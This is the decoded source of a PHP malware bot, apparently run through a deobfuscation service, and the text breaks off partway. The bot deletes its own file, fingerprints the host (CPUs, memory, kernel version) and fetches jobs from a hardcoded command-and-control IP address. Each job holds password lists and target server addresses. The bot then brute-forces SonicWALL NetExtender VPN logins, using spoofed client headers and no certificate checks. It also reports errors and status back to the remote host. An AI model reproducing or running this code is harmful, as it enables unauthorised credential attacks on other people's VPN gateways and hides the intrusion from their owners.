/* Decoded by unphp.net */
{$_VERSION} {$phpFP}
";
if (getmypid() === false || !is_int( getmypid() ) ) {
exit("!getmypid");
}
// file_get_contents('http://2.57.149.237/uniq.php?code=START');
function shutdown() {
global $_VERSION;
$lastError = error_get_last();
if (is_null($lastError)) {
return;
}
$errorTypeCode = $lastError['type'];
$exceptions = array(
E_ERROR => "E_ERROR",
E_WARNING => "E_WARNING",
E_PARSE => "E_PARSE",
E_NOTICE => "E_NOTICE",
E_CORE_ERROR => "E_CORE_ERROR",
E_CORE_WARNING => "E_CORE_WARNING",
E_COMPILE_ERROR => "E_COMPILE_ERROR",
E_COMPILE_WARNING => "E_COMPILE_WARNING",
E_USER_ERROR => "E_USER_ERROR",
E_USER_WARNING => "E_USER_WARNING",
E_USER_NOTICE => "E_USER_NOTICE",
E_STRICT => "E_STRICT",
E_RECOVERABLE_ERROR => "E_RECOVERABLE_ERROR",
E_DEPRECATED => "E_DEPRECATED",
E_USER_DEPRECATED => "E_USER_DEPRECATED",
E_ALL => "E_ALL"
);
if (isset($exceptions[$errorTypeCode])) {
$lastError['typeName'] = $exceptions[$errorTypeCode];
}
$lastError['phpversion'] = phpversion();
$lastError['_v'] = $_VERSION;
file_get_contents( 'http://2.57.149.237/collect-errors.php?b=' . base64_encode(json_encode($lastError)) );
}
// register_shutdown_function('shutdown');
set_time_limit(0);
if (!function_exists('curl_init') || !function_exists('curl_setopt')) {
unlink(__FILE__);
exit('!curl_init || curl_setopt');
}
// // file_get_contents('http://2.57.149.237/uniq.php?code=WITH_CURL');
if (!function_exists('random_bytes')) {
function random_bytes($len)
{
$str = '';
for ($i=0; $i < $len; $i++) {
$str .= chr( rand(0, 255) );
}
return $str;
}
}
// simplexml_load_string
if (!function_exists('simplexml_load_string')) {
unlink(__FILE__);
exit('!simplexml_load_string');
}
// // file_get_contents('http://2.57.149.237/uniq.php?code=WITH_SIMPLEXML');
$sysTempDir = sys_get_temp_dir();
if ( empty($sysTempDir) || !file_exists($sysTempDir)) {
$sysTempDir = '/tmp';
}
// check tmp folder
if (!file_exists($sysTempDir)) {
unlink(__FILE__);
exit("sysTempDir($sysTempDir) folder not found");
}
// // file_get_contents('http://2.57.149.237/uniq.php?code=WITH_SYS_TEM_DIR');
// file_get_contents('http://2.57.149.237/uniq.php?code=WITH_VALID_TEST_RESP');
// define countCPUs
$countCPUs = 0;
if (file_exists("/proc/cpuinfo")) {
$tmpData = file_get_contents("/proc/cpuinfo");
$countCPUs = substr_count($tmpData, "cpu MHz");
if ($countCPUs > 192) {
$countCPUs = 192;
}
}
// define maxCountPids
if ($countCPUs < 4) {
$maxCountPids = $countCPUs * 2;
}else{
$maxCountPids = $countCPUs * 10;
}
if ($maxCountPids < 1) {
$maxCountPids = 1;
}
if ($maxCountPids > 240) {
$maxCountPids = 240;
}
// end define maxCountPids
// defaul run proccess
$pids = getPids();
$pids[] = getmypid();
unlink(__FILE__);
if (count($pids) > $maxCountPids ) {
exit("pids too many
");
}
$pidsFP = $sysTempDir . '/jobs-JnfhngkJhgtt.pids';
$b = file_put_contents($pidsFP, json_encode($pids));
if ($b === false) {
exit("Error file_put_contents pidsFP");
}
// end defaul run proccess
// check google
$resp = curl_get_data('/test.php', 1);
$resp = json_decode($resp, true);
if ( !isset($resp['status']) || $resp['status'] !== true) {
unlink(__FILE__);
exit("curl invalid.
");
}
echo "Ok
";
// end check google
// main process
/*
$isMainProccess = true;
if (isset($argv[1])) {
$isMainProccess = false;
}
$pidsFP = $sysTempDir . '/jobs-JnfhngkJhgtt.pids';
if (function_exists('shell_exec')) {
// file_get_contents('http://2.57.149.237/uniq.php?code=SHELL_EXEC_STARTS');
if ($isMainProccess) {
// file_get_contents('http://2.57.149.237/uniq.php?code=SHELL_EXEC_STARTS_MAIN_PROC');
$pidMainProccesFP = $sysTempDir . '/jobs-JnfhngkJhgtt-main.pid';
if (file_exists($pidMainProccesFP)) {
$pidMainProcces = (int) file_get_contents($pidMainProccesFP);
if (file_exists("/proc/{$pidMainProcces}")) {
if (file_exists("/proc/{$pidMainProcces}/cmdline")) {
$cmdline = file_get_contents("/proc/{$pidMainProcces}/cmdline");
if (stripos($cmdline, $phpFP) !== false) {
// file_get_contents('http://2.57.149.237/uniq.php?code=SHELL_EXEC_ISSET_main_PROCC2');
exit("Isset main proccess
");
}
}else{
// file_get_contents('http://2.57.149.237/uniq.php?code=SHELL_EXEC_ISSET_main_PROCC');
exit("Isset main proccess
");
}
}
}
$b = file_put_contents($pidMainProccesFP, getmypid());
if ($b === false) {
// file_get_contents('http://2.57.149.237/uniq.php?code=SHELL_EXEC_ERR3');
exit("Error file_put_contents pidMainProccesFP");
}
$pids = getPids();
$countChildsToRun = $maxCountPids - count($pids);
echo "+ countChildsToRun($countChildsToRun) run pids(". count($pids) .")
";
for ($childProcIndex = 0; $childProcIndex < $countChildsToRun; $childProcIndex++) {
$childPid = shell_exec("/usr/local/bin/php {$phpFP} $childProcIndex > /dev/null 2>&1 & echo $!;");
if ($childPid) {
$childPid = (int) trim($childPid);
}
if (is_numeric($childPid) && $childPid > 0) {
$pids[] = $childPid;
echo "> run child($childProcIndex) $childPid
";
$b = file_put_contents($pidsFP, json_encode($pids));
if ($b === false) {
// file_get_contents('http://2.57.149.237/uniq.php?code=SHELL_EXEC_ERR2');
exit("Error file_put_contents pidsFP");
}
}else{
// file_get_contents('http://2.57.149.237/uniq.php?code=SHELL_EXEC_ERR');
}
sleep( rand(3, 12) );
}
unlink(__FILE__);
exit( "Main proccess done
");
}
}else{
// file_get_contents('http://2.57.149.237/uniq.php?code=shell_exec_NOT_ISSET');
$pids = getPids();
$pids[] = getmypid();
unlink(__FILE__);
if (count($pids) > $maxCountPids ) {
// file_get_contents('http://2.57.149.237/uniq.php?code=MAINPROCEES_PIDS_TOO_MANY');
exit("pids too many
");
}
$b = file_put_contents($pidsFP, json_encode($pids));
if ($b === false) {
exit("Error file_put_contents pidsFP");
}
}
// end main process
// child proccess
if (!$isMainProccess) {
$pids = getPids();
if (count($pids) > $maxCountPids ) {
// file_get_contents('http://2.57.149.237/uniq.php?code=CHILD_PIDS_TOO_MANY');
exit("pids too many
");
}
}
// end child proccess
// file_get_contents('http://2.57.149.237/uniq.php?code=WITH_SUCCESS_RUN_CHILD');
*/
function getPids()
{
global $sysTempDir, $phpFP;
$pidsFP = $sysTempDir . '/jobs-JnfhngkJhgtt.pids';
if (file_exists($pidsFP)) {
$pids = file_get_contents($pidsFP);
$pids = json_decode($pids, true);
if (!is_array($pids)) {
exit("pids empty format.");
}
}else{
$pids = array();
}
foreach($pids as $pidKey => $pid){
if (!is_numeric($pid) || $pid < 1) {
unset($pids[$pidKey]);
continue;
}
if (!file_exists("/proc/{$pid}")) {
unset($pids[$pidKey]);
}else{
if ( file_exists("/proc/{$pid}/cmdline") ){
$cmdline = file_get_contents("/proc/{$pid}/cmdline");
if (stripos($cmdline, $phpFP) === false) {
unset($pids[$pidKey]);
}
}
}
}
if (!is_array($pids)) {
$pids = array();
}
$pids = array_unique($pids);
$pids = array_values($pids);
return $pids;
}
function getInputData($resp)
{
$inputData = array();
$ppStart = 0;
$count = 0;
do{
$count++;
$pp = stripos($resp, '', $pp);
if ($ppEnd === false) {
continue;
}
$inputStr = substr($resp, $pp + 6, $ppEnd - $pp - 6);
// var_dump($inputStr);
$name = getValueBetween($inputStr, 'name="', '"');
$value = getValueBetween($inputStr, 'value="', '"');
if ( !empty($name) ) {
$inputData[$name] = (string) $value;
}
}while($count < 100);
return $inputData;
}
function getValueBetween($str, $from, $to)
{
$pp = strpos($str, $from);
if ($pp === false) {
return false;
}
$pp2 = strpos($str, $to, $pp + strlen($from));
if ($pp2 === false) {
return false;
}
return substr($str, $pp + strlen($from), $pp2 - $pp - strlen($from) );
}
function generate_random_hex($len){
$bytes = random_bytes( ceil($len / 2) );
return bin2hex($bytes);
}
function generate_mac_address(){
$bytes = generate_random_hex(12);
return implode("-", str_split($bytes, 2));
}
function xml_to_arr($xmlstring){
$xml = @simplexml_load_string($xmlstring, "SimpleXMLElement", LIBXML_NOCDATA);
$json = json_encode($xml);
return (array) json_decode($json,TRUE);
}
function getMemInfo()
{
if (file_exists("/proc/meminfo")) {
$meminfo = substr( file_get_contents("/proc/meminfo"), 0, 256 );
$meminfo = explode("
", $meminfo);
$meminfoNew = array();
foreach($meminfo as $meminfoKey => $meminfoVal){
$meminfoValArr = explode(":", $meminfoVal);
if (count($meminfoValArr) != 2) {
continue;
}
$meminfoNewKey = trim($meminfoValArr[0]);
$meminfoNew[$meminfoNewKey] = (int) trim($meminfoValArr[1]);
}
$meminfo = $meminfoNew;
}else{
$meminfo = false;
}
return $meminfo;
}
function get_random_router_ip()
{
global $_ROUTERS;
if (next($_ROUTERS) === false) {
reset($_ROUTERS);
}
return current($_ROUTERS);
}
function curl_get_data($query='', $maxTryes = 5 )
{
global $_ROUTER_MAIN;
$headers = array(
'User-Agent: curl/8.1',
);
if (function_exists('gzdecode')) {
$headers[] = 'Accept-Encoding: gzip';
}
for ($i = 0; $i < $maxTryes; $i++) {
if (stripos($query, '/valid-items.php') === false ) {
$remote_ip = get_random_router_ip();
}else{
$remote_ip = $_ROUTER_MAIN;
}
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://" . $remote_ip . $query);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
$response = curl_exec($ch);
// echo "+ respons(". strlen($response) .")
";
$httpcode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
$header_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE);
$header = substr($response, 0, $header_size);
$resp = substr($response, $header_size);
curl_close($ch);
if ($response !== false && $httpcode == 200) {
break;
}
}
if ($response === false) {
return false;
}
// unpack data
if (stripos($header, 'Content-Encoding: gzip') !== false) {
return gzdecode($resp);
}else{
return $resp;
}
}
$procVersion = trim(file_get_contents('/proc/version'));
/*
$sleepWhenStartSec = rand(5, 60);
echo "+ sleepWhenStartSec($sleepWhenStartSec)
";
sleep($sleepWhenStartSec);
*/
$countEmptyJobData = 0;
while (true) {
if ($countEmptyJobData >= 10) {
break;
}
/*
$sleepSec = rand(5, 30);
echo "Sleep time: $sleepSec
";
sleep($sleepSec);
*/
$count_pids = count( getPids() );
echo "+ count_pids($count_pids)
";
$meminfo = getMemInfo();
if (isset($meminfo['MemAvailable'])) {
$MemAvailable = $meminfo['MemAvailable'] / 1000;
// check
if ($MemAvailable < 500) {
// file_get_contents('http://2.57.149.237/uniq.php?code=MemAvailable_TOO_SMALL');
exit("MemAvailable too small
");
}
}else{
$MemAvailable = false;
}
$memPeak = memory_get_peak_usage() / 1000000;
// echo "- MemAvailable(". number_format($MemAvailable) ." Mb)
";
// echo "- memPeak(". number_format($memPeak) ." mb)
";
$getItemsUrlData = array(
'version' => $_VERSION,
"countCPUs" => $countCPUs,
"count_pids" => $count_pids,
"phpversion" => (float) phpversion(),
"simplexml_load_string" => function_exists('simplexml_load_string'),
"MemAvailable" => $MemAvailable,
"memPeak" => $memPeak,
"procVersion" => $procVersion,
);
$getItemsTMStart = microtime(true);
$itemsData = curl_get_data( '/get-items.php?b=' . base64_encode(json_encode($getItemsUrlData)), 1 );
$getItemsExecTime = microtime(true) - $getItemsTMStart;
echo "+ getItemsExecTime($getItemsExecTime)
";
echo "+ itemsData(". strlen($itemsData) ." bytes)
";
$itemsData = (array) json_decode($itemsData, true);
if (!empty($itemsData['jd'])) {
$data = $itemsData['jd'];
}else{
$data = false;
}
if ( isset($data['id']) ) {
$countEmptyJobData = 0;
$tmJobStart = microtime(true);
$jobCountProcedPasswds = 0;
$jobSign = $itemsData['js'];
$passwd_offset = $data['po'];
$generated_passwd_offset = (int) $data['gpo'];
$passwds = (array) $itemsData['pp'];
$generatedPasswds = (array) $itemsData['gp'];
$itemDataForBadRequest = array(
'id' => $data['id'],
"jobSign" => $jobSign,
);
echo "+ passwds(". count($passwds) .")
";
echo "+ generatedPasswds(". count($generatedPasswds) .")
";
$server_ip = long2ip($data['si']);
$hasBadResp = false;
$foundValidCreds = false;
// start type 2
if ($data['ti'] == 2 ){
$headers = array(
'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0',
'Accept: */*',
'Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3',
'Pragma: no-cache',
'Cache-Control: no-store, no-cache, must-revalidate',
'If-Modified-Since: Sat, 1 Jan 2000 00:00:00 GMT',
'Content-Type: text/plain;charset=UTF-8',
'Sec-Fetch-Dest: empty',
'Sec-Fetch-Mode: cors',
'Sec-Fetch-Site: same-origin',
);
$headers_sonic = array(
'User-Agent: SonicWALL NetExtender for Windows 10.2.339 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1) x86_64',
"Client-Name: NetExtender Windows Client",
"Client-Version: 10.2.339",
"X-NE-SESSIONPROMPT: true",
"X-NE-pda: true",
'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
'Accept-Language: en-us',
// 'Referer: '. $schema_ip .'/cgi-bin/welcome',
'Content-Type: application/x-www-form-urlencoded',
// 'Origin: ' . $schema_ip,
'Connection: keep-alive',
'Upgrade-Insecure-Requests: 1',
);
$ch = curl_init();
$schema_ip = "https://{$server_ip}:{$data['sp']}";
$url = $schema_ip;
echo "~ $url
";
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
$resp = curl_exec($ch);
$pageDomains = array();
$tmpDomainsStr = getValueBetween($resp, "name='domain'", "");
if (!empty($tmpDomainsStr)) {
$domainsArr = explode("
", $tmpDomainsStr);
foreach($domainsArr as $domainsArrItem){
if (stripos($domainsArrItem, '